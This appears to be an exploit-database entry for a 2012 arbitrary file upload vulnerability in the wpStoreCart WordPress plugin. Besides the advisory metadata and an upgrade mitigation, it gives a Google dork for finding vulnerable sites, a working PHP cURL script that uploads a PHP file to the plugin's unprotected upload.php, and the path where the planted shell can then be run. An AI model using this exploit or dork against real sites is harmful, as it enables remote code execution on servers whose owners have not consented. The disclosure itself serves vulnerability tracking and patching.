header-logo
Suggest Exploit
vendor:
wpStoreCart
by:
Sammy FORGIT
8,8
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: wpStoreCart
Affected Version From: 2.5.27
Affected Version To: 2.5.29
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wpstorecart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

WordPress Plugins – wpStoreCart Arbitrary File Upload Vulnerability

An arbitrary file upload vulnerability exists in the wpStoreCart plugin for WordPress. A remote attacker can exploit this vulnerability to upload arbitrary PHP code and execute it in the context of the webserver process. The vulnerable plugin version is 2.5.27 - 2.5.29. An attacker can use the Google Dork 'inurl:/wp-content/plugins/wpstorecart/' to find vulnerable websites. The exploit code is a PHP script that uses cURL to upload a malicious PHP file to the vulnerable website. The uploaded file can be accessed at http://www.example.com/wordpress/wp-content/uploads/wpstorecart/lo.php.

Mitigation:

Upgrade to the latest version of the wpStoreCart plugin.
Source

Exploit-DB raw data:

##################################################
# Description : Wordpress Plugins - wpStoreCart Arbitrary File Upload 
Vulnerability
# Version : 2.5.27 - 2.5.29
# Link : http://wordpress.org/extend/plugins/wpstorecart/
# Plugins : http://downloads.wordpress.org/plugin/wpstorecart.2.5.29.zip
# Date : 03-06-2012
# Google Dork : inurl:/wp-content/plugins/wpstorecart/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php";
$ch = 
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/wpstorecart/php/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.exemple.com/wordpress/wp-content/uploads/wpstorecart/lo.php

lo.php
<?php
phpinfo();
?>